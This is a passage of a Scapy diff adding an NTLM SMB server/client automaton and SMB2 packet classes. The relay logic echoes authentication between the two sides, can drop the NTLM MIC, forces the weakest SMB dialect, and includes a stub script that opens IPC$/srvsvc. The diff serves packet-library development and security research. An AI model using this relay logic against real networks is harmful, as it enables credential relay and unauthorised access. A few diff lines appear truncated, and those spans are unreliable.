"Status", 0x0 if self.authenticated else 0xc0000016) + self.send(resp) + + @ATMT.condition(RECEIVED_SETUP_ANDX_REQUEST) + def wait_for_next_request(self): + if self.authenticated: + raise self.AUTHENTICATED() + else: + raise self.NEGOTIATED() + + @ATMT.state() + def AUTHENTICATED(self): + """Dev: overload this""" + pass + + @ATMT.condition(AUTHENTICATED, prio=0) + def should_end(self): + if not self.ECHO: + # Close connection + raise self.END() + + @ATMT.receive_condition(AUTHENTICATED, prio=1) + def receive_packet(self, pkt): + if self.ECHO: + raise self.AUTHENTICATED().action_parameters(pkt) + + @ATMT.action(receive_packet) + def pass_packet(self, pkt): + # Pre-process some of the data if possible + if not self.SMB2: + # SMB1 - no signature (disabled by our implementation) + if SMBTree_Connect_AndX in pkt and self.REAL_HOSTNAME: + pkt.LENGTH = None + pkt.ByteCount = None + pkt.Path = ( + "\\\\%s\\" % self.REAL_HOSTNAME + + pkt.Path[2:].split("\\", 1)[1] + ) + else: + self.smb_header.MessageId += 1 + # SMB2 + if SMB2_IOCTL_Request in pkt and pkt.CtlCode == 0x00140204: + # FSCTL_VALIDATE_NEGOTIATE_INFO + # This is a security measure asking the server to validate + # what flags were negotiated during the SMBNegotiate exchange. + # This packet is ALWAYS signed. + # A SMB server < SMB3 (e.g. Windows 7) will reply with + # STATUS_FILE_CLOSED, which is what we do here, however we + # CANNOT SIGN the response. Most clients will abort the + # connection after receiving this, despite our best effort, + # as our answer is unsigned... + pkt = self.smb_header.copy() / \ + SMB2_Error_Response(ErrorData=b"\xff") + pkt.Status = 0xc0000128 # STATUS_FILE_CLOSED + pkt.Command = "SMB2_IOCTL" + pkt.Flags = pkt.Flags + "SMB2_FLAGS_SERVER_TO_REDIR" - \ + "SMB2_FLAGS_SIGNED" + self.send(pkt) + return + self.echo(pkt) + + @ATMT.state(final=1) + def END(self): + self.end() + + +class NTLM_SMB_Client(NTLM_Client, Automaton): + port = 445 + cls = NBTSession + kwargs_cls = { + NTLM_SMB_Server: {"CLIENT_PROVIDES_NEGOEX": True, "ECHO": True} + } + + def __init__(self, *args, **kwargs): + self.EXTENDED_SECURITY = kwargs.pop("EXTENDED_SECURITY", True) + self.ALLOW_SMB2 = kwargs.pop("ALLOW_SMB2", True) + self.REAL_HOSTNAME = kwargs.pop("REAL_HOSTNAME", None) + self.RUN_SCRIPT = kwargs.pop("RUN_SCRIPT", None) + self.SMB2 = False + super(NTLM_SMB_Client, self).__init__(*args, **kwargs) + + @ATMT.state(initial=1) + def BEGIN(self): + pass + + @ATMT.condition(BEGIN) + def continue_smb2(self): + kwargs = self.wait_server() + self.CONTINUE_SMB2 = kwargs.pop("CONTINUE_SMB2", False) + self.SMB2_INIT_PARAMS = kwargs.pop("SMB2_INIT_PARAMS", {}) + if self.CONTINUE_SMB2: + self.SMB2 = True + self.smb_header = NBTSession() / SMB2_Header( + AsyncId=0xfeff + ) + raise self.SMB2_NEGOTIATE() + + @ATMT.condition(BEGIN, prio=1) + def send_negotiate(self): + raise self.SENT_NEGOTIATE() + + @ATMT.action(send_negotiate) + def on_negotiate(self): + self.smb_header = NBTSession() / SMB_Header( + Flags2=( + "LONG_NAMES+EAS+NT_STATUS+UNICODE+" + "SMB_SECURITY_SIGNATURE+EXTENDED_SECURITY" + ), + TID=0xFFFF, + PIDLow=0xFEFF, + UID=0, + MID=0 + ) + if self.EXTENDED_SECURITY: + self.smb_header.Flags2 += "EXTENDED_SECURITY" + pkt = self.smb_header.copy() / SMBNegotiate_Request( + Dialects=[SMB_Dialect(DialectString=x) for x in [ + "PC NETWORK PROGRAM 1.0", "LANMAN1.0", + "Windows for Workgroups 3.1a", "LM1.2X002", "LANMAN2.1", + "NT LM 0.12" + ] + (["SMB 2.002", "SMB 2.???"] if self.ALLOW_SMB2 else []) + ], + ) + if not self.EXTENDED_SECURITY: + pkt.Flags2 -= "EXTENDED_SECURITY" + pkt[SMB_Header].Flags2 = pkt[SMB_Header].Flags2 - \ + "SMB_SECURITY_SIGNATURE" + \ + "SMB_SECURITY_SIGNATURE_REQUIRED+IS_LONG_NAME" + self.send(pkt) + + @ATMT.state() + def SENT_NEGOTIATE(self): + pass + + @ATMT.receive_condition(SENT_NEGOTIATE) + def receive_negotiate_response(self, pkt): + if SMBNegotiate_Response_Security in pkt or\ + SMBNegotiate_Response_Extended_Security in pkt or\ + SMB2_Negotiate_Protocol_Response in pkt: + self.set_srv( + "ServerTime", + pkt.ServerTime + ) + self.set_srv( + "SecurityMode", + pkt.SecurityMode + ) + if SMB2_Negotiate_Protocol_Response in pkt: + # SMB2 + self.SMB2 = True # We are using SMB2 to talk to the server + self.smb_header = NBTSession() / SMB2_Header( + AsyncId=0xfeff + ) + else: + # SMB1 + self.set_srv( + "ServerTimeZone", + pkt.ServerTimeZone + ) + if SMBNegotiate_Response_Extended_Security in pkt or\ + SMB2_Negotiate_Protocol_Response in pkt: + # Extended SMB1 / SMB2 + negoex_tuple = self._get_token( + pkt.SecurityBlob + ) + self.set_srv( + "GUID", + pkt.GUID + ) + self.received_ntlm_token(negoex_tuple) + if SMB2_Negotiate_Protocol_Response in pkt and \ + pkt.DialectRevision in [0x02ff, 0x03ff]: + # There will be a second negotiate protocol request + self.smb_header.MessageId += 1 + raise self.SMB2_NEGOTIATE() + else: + raise self.NEGOTIATED() + elif SMBNegotiate_Response_Security in pkt: + # Non-extended SMB1 + self.set_srv("Challenge", pkt.Challenge) + self.set_srv("DomainName", pkt.DomainName) + self.set_srv("ServerName", pkt.ServerName) + self.received_ntlm_token((None, None, None)) + raise self.NEGOTIATED() + + @ATMT.state() + def SMB2_NEGOTIATE(self): + pass + + @ATMT.condition(SMB2_NEGOTIATE) + def send_negotiate_smb2(self): + raise self.SENT_NEGOTIATE() + + @ATMT.action(send_negotiate_smb2) + def on_negotiate_smb2(self): + pkt = self.smb_header.copy() / SMB2_Negotiate_Protocol_Request( + # Only ask for SMB 2.0.2 because it has the lowest security + Dialects=[0x0202], + Capabilities=( + "DFS+Leasing+LargeMTU+MultiChannel+" + "PersistentHandles+DirectoryLeasing+Encryption" + ), + SecurityMode=0, + ClientGUID=self.SMB2_INIT_PARAMS.get("ClientGUID", RandUUID()), + ) + self.send(pkt) + + @ATMT.state() + def NEGOTIATED(self): + pass + + @ATMT.condition(NEGOTIATED) + def should_send_setup_andx_request(self): + ntlm_tuple = self.get_token() + raise self.SENT_SETUP_ANDX_REQUEST().action_parameters(ntlm_tuple) + + @ATMT.state() + def SENT_SETUP_ANDX_REQUEST(self): + pass + + @ATMT.action(should_send_setup_andx_request) + def send_setup_andx_request(self, ntlm_tuple): + ntlm_token, negResult, MIC = ntlm_tuple + if self.SMB2: + self.smb_header.MessageId = self.get("MessageId") + self.smb_header.AsyncId = self.get("AsyncId") + self.smb_header.SessionId = self.get("SessionId") + else: + self.smb_header.UID = self.get("UID", 0) + self.smb_header.MID = self.get("MID") + self.smb_header.TID = self.get("TID") + if self.SMB2 or self.EXTENDED_SECURITY: + # SMB1 extended / SMB2 + if self.SMB2: + # SMB2 + pkt = self.smb_header.copy() / SMB2_Session_Setup_Request( + Capabilities="DFS", + SecurityMode=0, + ) + pkt.CreditsRequested = 33 + else: + # SMB1 extended + pkt = self.smb_header.copy() / \ + SMBSession_Setup_AndX_Request_Extended_Security( + ServerCapabilities=( + "UNICODE+NT_SMBS+STATUS32+LEVEL_II_OPLOCKS+" + "DYNAMIC_REAUTH+EXTENDED_SECURITY" + ), + VCNumber=self.get("VCNumber"), + NativeOS=b"", + NativeLanMan=b"" + ) + pkt.SecuritySignature = self.get("SecuritySignature") + if isinstance(ntlm_token, NTLM_NEGOTIATE): + pkt.SecurityBlob = GSSAPI_BLOB( + innerContextToken=SPNEGO_negToken( + token=SPNEGO_negTokenInit( + mechTypes=[ + # NTLMSSP + SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.10")], + mechToken=SPNEGO_Token( + value=ntlm_token + ) + ) + ) + ) + elif isinstance(ntlm_token, (NTLM_AUTHENTICATE, + NTLM_AUTHENTICATE_V2)): + pkt.SecurityBlob = SPNEGO_negToken( + token=SPNEGO_negTokenResp( + negResult=negResult, + ) + ) + # Token may be missing (e.g. STATUS_MORE_PROCESSING_REQUIRED) + if ntlm_token: + pkt.SecurityBlob.token.responseToken = SPNEGO_Token( + value=ntlm_token + ) + if MIC and not self.DROP_MIC: # Drop the MIC? + pkt.SecurityBlob.token.mechListMIC = SPNEGO_MechListMIC( + value=MIC + ) + else: + # Non-extended security + pkt = self.smb_header.copy() / SMBSession_Setup_AndX_Request( + ServerCapabilities="UNICODE+NT_SMBS+STATUS32+LEVEL_II_OPLOCKS", + VCNumber=self.get("VCNumber"), + NativeOS=b"", + NativeLanMan=b"", + OEMPassword=b"\0" * 24, + UnicodePassword=ntlm_token, + PrimaryDomain=self.get("PrimaryDomain"), + AccountName=self.get("AccountName"), + ) / SMBTree_Connect_AndX( + Flags="EXTENDED_RESPONSE", + Path=self.get("Path"), + Service=self.get("Service"), + Password=b"\0", + ) + self.send(pkt) + + @ATMT.receive_condition(SENT_SETUP_ANDX_REQUEST) + def receive_setup_andx_response(self, pkt): + if SMBSession_Null in pkt or \ + SMBSession_Setup_AndX_Response_Extended_Security in pkt or \ + SMBSession_Setup_AndX_Response in pkt: + # SMB1 + self.set_srv("Status", pkt[SMB_Header].Status) + self.set_srv( + "UID", + pkt[SMB_Header].UID + ) + self.set_srv( + "MID", + pkt[SMB_Header].MID + ) + self.set_srv( + "TID", + pkt[SMB_Header].TID + ) + if SMBSession_Null in pkt: + # Likely an error + self.received_ntlm_token((None, None, None)) + raise self.NEGOTIATED() + elif SMBSession_Setup_AndX_Response_Extended_Security in pkt or \ + SMBSession_Setup_AndX_Response in pkt: + self.set_srv( + "NativeOS", + pkt.getfieldval( + "NativeOS") + ) + self.set_srv( + "NativeLanMan", + pkt.getfieldval( + "NativeLanMan") + ) + if SMB2_Session_Setup_Response in pkt: + # SMB2 + self.set_srv("Status", pkt.Status) + self.set_srv("SecuritySignature", pkt.SecuritySignature) + self.set_srv("MessageId", pkt.MessageId) + self.set_srv("AsyncId", pkt.AsyncId) + self.set_srv("SessionId", pkt.SessionId) + if SMBSession_Setup_AndX_Response_Extended_Security in pkt or \ + SMB2_Session_Setup_Response in pkt: + # SMB1 extended / SMB2 + _, negResult, _ = ntlm_tuple = self._get_token( + pkt.SecurityBlob + ) + if negResult == 0: # Authenticated + self.received_ntlm_token(ntlm_tuple) + raise self.AUTHENTICATED() + else: + self.received_ntlm_token(ntlm_tuple) + raise self.NEGOTIATED().action_parameters(pkt) + elif SMBSession_Setup_AndX_Response_Extended_Security in pkt: + # SMB1 non-extended + pass + + @ATMT.state() + def AUTHENTICATED(self): + pass + + @ATMT.condition(AUTHENTICATED) + def should_run_script(self): + if self.RUN_SCRIPT: + raise self.DO_RUN_SCRIPT() + + @ATMT.receive_condition(AUTHENTICATED) + def receive_packet(self, pkt): + raise self.AUTHENTICATED().action_parameters(pkt) + + @ATMT.action(receive_packet) + def pass_packet(self, pkt): + self.echo(pkt) + + @ATMT.state(final=1) + def DO_RUN_SCRIPT(self): + # This is an example script, mostly unimplemented... + # Tree connect + self.smb_header.MessageId += 1 + self.send( + self.smb_header.copy() / + SMB2_Tree_Connect_Request( + Buffer=[('Path', '\\\\%s\\IPC$' % self.REAL_HOSTNAME)] + ) + ) + # Create srvsvc + self.smb_header.MessageId += 1 + pkt = self.smb_header.copy() + pkt.Command = "SMB2_CREATE" + pkt /= Raw(load=b'9\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x12\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00x\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00s\x00r\x00v\x00s\x00v\x00c\x00') # noqa: E501 + self.send(pkt) + # ... run something? + self.end() diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index d084e6fb634..9cd73be534a 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -12,6 +12,8 @@ from scapy.config import conf from scapy.packet import Packet, bind_layers, bind_top_down from scapy.fields import ( + ByteEnumField, + ByteField, ConditionalField, FieldLenField, FieldListField, @@ -32,9 +34,12 @@ UTCTimeField, UUIDField, XLEIntField, + XLELongField, XLEShortField, XNBytesField, XStrLenField, + XStrFixedLenField, + XStrField, ) from scapy.layers.gssapi import GSSAPI_BLOB @@ -43,9 +48,9 @@ # EnumField SMB_DIALECTS = { - 0x0202: 'SMB 2.0.2', + 0x0202: 'SMB 2.002', 0x0210: 'SMB 2.1', - 0x02ff: 'SMB 2.?', + 0x02ff: 'SMB 2.???', 0x0300: 'SMB 3.0', 0x0302: 'SMB 3.0.2', 0x0311: 'SMB 3.1.1', @@ -106,7 +111,7 @@ def _SMB2_post_build(self, p, pay_offset, fields): """Util function to build the offset and populate the lengths""" - for field_name, value in self.Buffer: + for field_name, value in self.fields["Buffer"]: length = self.get_field( "Buffer").fields_map[field_name].i2len(self, value) offset = fields[field_name] @@ -130,8 +135,7 @@ class SMB2_Header(Packet): StrFixedLenField("Start", b"\xfeSMB", 4), LEShortField("StructureSize", 64), LEShortField("CreditCharge", 0), - LEShortField("ChannelSequence", 0), - LEShortField("Unused", 0), + LEIntField("Status", 0), LEShortEnumField("Command", 0, SMB2_COM), LEShortField("CreditsRequested", 0), FlagsField("Flags", 0, -32, { @@ -144,9 +148,9 @@ class SMB2_Header(Packet): }), XLEIntField("NextCommand", 0), LELongField("MessageId", 0), - LELongField("AsyncID", 0), + LELongField("AsyncId", 0), LELongField("SessionId", 0), - XNBytesField("Signature", 0, 16), + XNBytesField("SecuritySignature", 0, 16), ] def guess_payload_class(self, payload): @@ -158,6 +162,18 @@ def guess_payload_class(self, payload): if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR: return SMB2_Session_Setup_Response return SMB2_Session_Setup_Request + elif self.Command == 0x0003: # TREE connect + if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR: + return SMB2_Tree_Connect_Response + return SMB2_Tree_Connect_Request + elif self.Command == 0x0006: # Close + if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR: + pass + return SMB2_Close_Request + elif self.Command == 0x000B: # IOCTL + if self.Flags.SMB2_FLAGS_SERVER_TO_REDIR: + pass + return SMB2_IOCTL_Request return super(SMB2_Header, self).guess_payload_class(payload) @@ -177,6 +193,31 @@ class SMB2_Compression_Transform_Header(Packet): XLEIntField("Offset_or_Length", 0), ] +# sect 2.2.2 + + +class SMB2_Error_Response(Packet): + name = "SMB2 Negotiate Context" + fields_desc = [ + XLEShortField("StructureSize", 0x09), + ByteField("ErrorContextCount", 0), + ByteField("Reserved", 0), + FieldLenField( + "ByteCount", None, + fmt=" bytes return _SMB2_post_build(self, pkt, self.OFFSET, { @@ -447,7 +506,6 @@ def post_build(self, pkt, pay): SMB2_Header, SMB2_Session_Setup_Request, Command=0x0001, - Flags=1 # SMB2_FLAGS_SERVER_TO_REDIR ) # sect 2.2.6 @@ -457,24 +515,35 @@ class SMB2_Session_Setup_Response(Packet): name = "SMB2 Session Setup Response" OFFSET = 8 + 64 fields_desc = [ - XLEShortField("StructureSize", 0), + XLEShortField("StructureSize", 0x9), FlagsField("SessionFlags", 0, -16, { 0x0001: "IS_GUEST", 0x0002: "IS_NULL", 0x0004: "ENCRYPT_DATE", }), XLEShortField("SecurityBufferOffset", None), - FieldLenField( - "SecurityLen", None, - fmt=" bytes return _SMB2_post_build(self, pkt, self.OFFSET, { @@ -488,3 +557,157 @@ def post_build(self, pkt, pay): Command=0x0001, Flags=1 # SMB2_FLAGS_SERVER_TO_REDIR ) + + +# sect 2.2.9 + + +class SMB2_Tree_Connect_Request(Packet): + name = "SMB2 TREE_CONNECT Request" + OFFSET = 8 + 64 + fields_desc = [ + XLEShortField("StructureSize", 0x9), + FlagsField("Flags", 0, -16, ["CLUSTER_RECONNECT", + "REDIRECT_TO_OWNER", + "EXTENSION_PRESENT"]), + XLEShortField("PathBufferOffset", None), + LEShortField("PathLen", None), + _NTLMPayloadField( + 'Buffer', OFFSET, [ + StrFieldUtf16("Path", b""), + ]) + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Path": 4, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Tree_Connect_Request, + Command=0x0003, +) + +# sect 2.2.10 + + +class SMB2_Tree_Connect_Response(Packet): + name = "SMB2 TREE_CONNECT Response" + OFFSET = 8 + 64 + fields_desc = [ + XLEShortField("StructureSize", 0x9), + ByteEnumField("ShareType", 0, {0x01: "DISK", + 0x02: "PIPE", + 0x03: "PRINT"}), + ByteField("Reserved", 0), + FlagsField("ShareFlags", 0, -32, { + 0x00000010: "AUTO_CACHING", + 0x00000020: "VDO_CACHING", + 0x00000030: "NO_CACHING", + 0x00000001: "DFS", + 0x00000002: "DFS_ROOT", + 0x00000100: "RESTRICT_EXCLUSIVE_OPENS", + 0x00000200: "FORCE_SHARED_DELETE", + 0x00000400: "ALLOW_NAMESPACE_CACHING", + 0x00000800: "ACCESS_BASED_DIRECTORY_ENUM", + 0x00001000: "FORCE_LEVELII_OPLOCK", + 0x00002000: "ENABLE_HASH_V1", + 0x00004000: "ENABLE_HASH_V2", + 0x00008000: "ENCRYPT_DATA", + 0x00040000: "IDENTITY_REMOTING", + 0x00100000: "COMPRESS_DATA", + }), + FlagsField("Capabilities", 0, -32, {}), + XLEIntField("MaximalAccess", 0), + ] + + +bind_top_down( + SMB2_Header, + SMB2_Tree_Connect_Response, + Command=0x0003, + Flags=1 +) + +# sect 2.2.14.1 + + +class SMB2_FILEID(Packet): + fields_desc = [ + LELongField("Persistent", 0), + LELongField("Volatile", 0) + ] + +# sect 2.2.15 + + +class SMB2_Close_Request(Packet): + name = "SMB2 CLOSE Request" + fields_desc = [ + XLEShortField("StructureSize", 0x18), + FlagsField("Flags", 0, -16, + ["POSTQUERY_ATTRIB"]), + LEIntField("Reserved", 0), + PacketField("FileId", SMB2_FILEID(), SMB2_FILEID) + ] + + +bind_top_down( + SMB2_Header, + SMB2_Close_Request, + Command=0x0006, +) + + +# sect 2.2.31 + + +class SMB2_IOCTL_Request(Packet): + name = "SMB2 IOCTL Request" + # Barely implemented + fields_desc = [ + XLEShortField("StructureSize", 0x39), + LEShortField("Reserved", 0), + LEIntField("CtlCode", 0), + XStrFixedLenField("FileId", b"", length=16), + LEIntField("InputOffset", 0), + LEIntField("InputCount", 0), + LEIntField("MaxInputResponse", 0), + LEIntField("OutputOffset", 0), + LEIntField("OutputCount", 0), + LEIntField("MaxOutputResponse", 0), + LEIntField("Flags", 0), + LEIntField("Reserved2", 0), + XStrField("Buffer", b""), + ] + + +bind_top_down( + SMB2_Header, + SMB2_IOCTL_Request, + Command=0x000B, +) + +# sect 2.2.32 + + +class SMB2_IOCTL_Response(Packet): + name = "SMB2 IOCTL Request" + # Barely implemented + StructureSize = 0x31 + fields_desc = ( + SMB2_IOCTL_Request.fields_desc[:6] + + SMB2_IOCTL_Request.fields_desc[7:9] + + SMB2_IOCTL_Request.fields_desc[10:] + ) + + +bind_top_down( + SMB2_Header, + SMB2_IOCTL_Response, + Command=0x000B, + Flags=1 # SMB2_FLAGS_SERVER_TO_REDIR +) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index f17ac578af2..32b70a33871 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -151,6 +151,9 @@ def i2h(self, pkt, x): return x return 0 + def i2m(self, pkt, x): + return int(x) if x is not None else 0 + class _TLSRandomBytesField(StrFixedLenField): def i2repr(self, pkt, x): diff --git a/test/scapy/layers/netflow.uts b/test/scapy/layers/netflow.uts index 3d7d0b25ed3..e15f0f0377e 100644 --- a/test/scapy/layers/netflow.uts +++ b/test/scapy/layers/netflow.uts @@ -93,7 +93,7 @@ assert nfv9_defrag[0].records[0].IPV4_SRC_ADDR == "127.0.0.1" ~ netflow header = Ether()/IP()/UDP() -netflow_header = NetflowHeader()/NetflowHeaderV9() +netflow_header = NetflowHeader()/NetflowHeaderV9(unixSecs=0) flowset = NetflowFlowsetV9( templates=[NetflowTemplateV9( diff --git a/test/scapy/layers/smb.uts b/test/scapy/layers/smb.uts index d9823eeaced..38f8c1cc7c3 100644 --- a/test/scapy/layers/smb.uts +++ b/test/scapy/layers/smb.uts @@ -64,7 +64,25 @@ assert smb_nego_resp.SecurityBlob.MechType.oidname == 'SPNEGO - Simple Protected assert smb_nego_resp.SecurityBlob.innerContextToken.token.mechTypes[0].oid.oidname == 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism' assert smb_nego_resp.ServerCapabilities.EXTENDED_SECURITY assert smb_nego_resp.Flags2.EXTENDED_SECURITY -assert smb_nego_resp.SecurityBlob.innerContextToken.token.mechToken.value # TODO: Implement + +from uuid import UUID + +negoex_nego = smb_nego_resp.SecurityBlob.innerContextToken.token.mechToken.value +assert negoex_nego.MessageType == 1 +assert negoex_nego.SequenceNum == 0 +assert len(negoex_nego.Payload) == 1 +assert negoex_nego.sprintf("%Payload%") == '[(\'AuthScheme\', "[UUID(\'[NTLM-UUID]\')]")]' +assert negoex_nego.ConversationId == UUID('313c2a3a-c72b-3ca9-6dac-3874a7dd1d5b') + +negoex_exch = negoex_nego.payload +assert negoex_exch.MessageType == 3 +assert negoex_exch.SequenceNum == 1 +assert negoex_exch.sprintf("%AuthScheme%") == "UUID('[NTLM-UUID]')" +assert negoex_exch.ExchangeLen == len(negoex_exch.Payload[0][1]) +assert negoex_exch.Payload[0][0] == "Exchange" +assert bytes(negoex_exch.Payload[0][1]) == b"0V\xa0T0R0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key" +assert negoex_exch.Payload[0][1].items[0].token == b"Token Signing Public Key" +assert negoex_exch.Payload[0][1].items[0].oid == "2.5.4.3" = SMB Setup AndX Request (ES) @@ -77,7 +95,6 @@ assert smb_sax_req_1.Flags2.UNICODE assert isinstance(smb_sax_req_1.SecurityBlob.innerContextToken.token.mechToken.value, NTLM_NEGOTIATE) ntlm_nego = smb_sax_req_1.SecurityBlob.innerContextToken.token.mechToken.value assert ntlm_nego.ProductBuild == 10586 -assert ntlm_nego.Payload == [('DomainName', ''), ('WorkstationName', '')] = SMB Setup AndX Response (ES) @@ -126,6 +143,6 @@ assert ntlm_authenticate.Payload[2][1] == b'/\t\x13+\x81\xa6\x15\x14\xb9\x11\x8b smb_sax_resp_2 = Ether(b'\x00\x0c)a\xf5_\x00PV\xc0\x00\x01\x08\x00E\x00\x00\xb6\x03J@\x00\x80\x06\xe7\x1f\xc0\xa8\xc7\x01\xc0\xa8\xc7\x85\x00\x8b\xc2\x08\x10]~J\xd7\xcb\xf0YP\x18\x00\xfeB\x10\x00\x00\x00\x00\x00\x8a\xffSMBs\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x08 \x00\x04\xff\x00\x8a\x00\x00\x00\x1d\x00_\x00\xa1\x1b0\x19\xa0\x03\n\x01\x00\xa3\x12\x04\x10\x01\x00\x00\x00\xee\t\x91S\xab\x7f]\xe6\x00\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x008\x00.\x001\x00 \x009\x006\x000\x000\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x008\x00.\x001\x00 \x006\x00.\x003\x00\x00\x00') assert SMBSession_Setup_AndX_Response_Extended_Security in smb_sax_resp_2 assert smb_sax_resp_2.SecurityBlob.token.negResult == 0 -assert smb_sax_resp_2.SecurityBlob.token.mechListMIC.value.val == b'\x04\x10\x01\x00\x00\x00\xee\t\x91S\xab\x7f]\xe6\x00\x00\x00\x00' +assert smb_sax_resp_2.SecurityBlob.token.mechListMIC.value.val == b'\x01\x00\x00\x00\xee\t\x91S\xab\x7f]\xe6\x00\x00\x00\x00' assert smb_sax_resp_2.NativeOS == 'Windows 8.1 9600' assert smb_sax_resp_2.NativeLanMan == 'Windows 8.1 6.3' diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index cb6d5f7bed1..7320e8fc79b 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -16,15 +16,15 @@ smb2 = pkt[SMB2_Header] assert smb2.Start == b'\xfeSMB' assert smb2.StructureSize == 64 assert smb2.CreditCharge == 1 -assert smb2.ChannelSequence == 0 +assert smb2.CreditsRequested == 0 assert smb2.Command == 0 assert smb2.CreditsRequested == 0 assert smb2.Flags == 0 assert smb2.NextCommand == 0 assert smb2.MessageId == 0 -assert smb2.AsyncID == 0 +assert smb2.AsyncId == 0 assert smb2.SessionId == 0 -assert smb2.Signature == 0xffeeddccbbaa99887766554433221100 +assert smb2.SecuritySignature == 0xffeeddccbbaa99887766554433221100 # KO test rawpkt = b'\x45\x00\x01\x18\x16\x2c\x40\x00\x37\x06\xc4\x14\x91\xdc\x18\x13\xc0\xa8\xfe\x07\x9d\x76\x01\xbd\x37\x06\x5e\x82\xa3\xca\x83\xd2\x50\x18\x01\xf6\x11\x5b\x00\x00\x00\x00\x00\xec\xf0\x53\x4d\x42\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff\x24\x00\x04\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x59\x9e\x84\xf1\x9d\x61\xce\x99\x1f\x50\x5c\x04\x44\x74\xb1\x0a\x70\x00\x00\x00\x04\x00\x00\x00\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x00\x00\x01\x00\x26\x00\x00\x00\x00\x00\x01\x00\x20\x00\x01\x00\x75\x06\x05\xed\x60\x88\x9e\xcb\x5e\x79\xbb\xe8\x44\x59\xc5\x5c\xd2\x82\x51\x06\x32\x7a\x6e\x2e\x41\xc5\xa8\x3f\xdd\xf2\xc5\x18\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x03\x00\x10\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x1c\x00\x00\x00\x00\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00\x38\x00\x2e\x00\x31\x00\x37\x00\x38\x00\x2e\x00\x32\x00\x31\x00' @@ -160,13 +160,11 @@ assert SMB2_Negotiate_Protocol_Response in pkt nego_resp = pkt[SMB2_Negotiate_Protocol_Response] # check field values -print(repr(nego_resp.SecurityMode)) -print(dir(nego_resp.SecurityMode)) assert nego_resp.StructureSize == 0x41 assert str(nego_resp.SecurityMode) == 'Signing Required' assert nego_resp.DialectRevision == 0x0311 assert nego_resp.NegotiateCount == 0x3 -assert str(nego_resp.ServerGUID) == '1cdd6d53-1f30-4244-a5c8-88737a6805e1' +assert str(nego_resp.GUID) == '1cdd6d53-1f30-4244-a5c8-88737a6805e1' assert nego_resp.Capabilities == 0x2f assert nego_resp.MaxTransactionSize == 0x00800000 assert nego_resp.MaxReadSize == 0x00800000 @@ -174,7 +172,7 @@ assert nego_resp.MaxWriteSize == 0x00800000 assert nego_resp.SecurityBlobOffset == 0x00000080 assert nego_resp.SecurityBlobLength == 320 assert nego_resp.NegotiateContextOffset == 0x1c0 -assert nego_resp.SecurityBlob.innerContextToken.token.mechToken.value.val == b"NEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\xa1w\x02z2\xa9bx\n!\xfb\x9e,^\xe9x\xeb\xab\xee\x91\xfd\xfc\xda\x0f\xc5\x91\x03n\xf8\xfdL\x08\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08NEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08@\x00\x00\x00X\x00\x00\x000V\xa0T0R0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key" +assert bytes(nego_resp.SecurityBlob.innerContextToken.token.mechToken.value) == 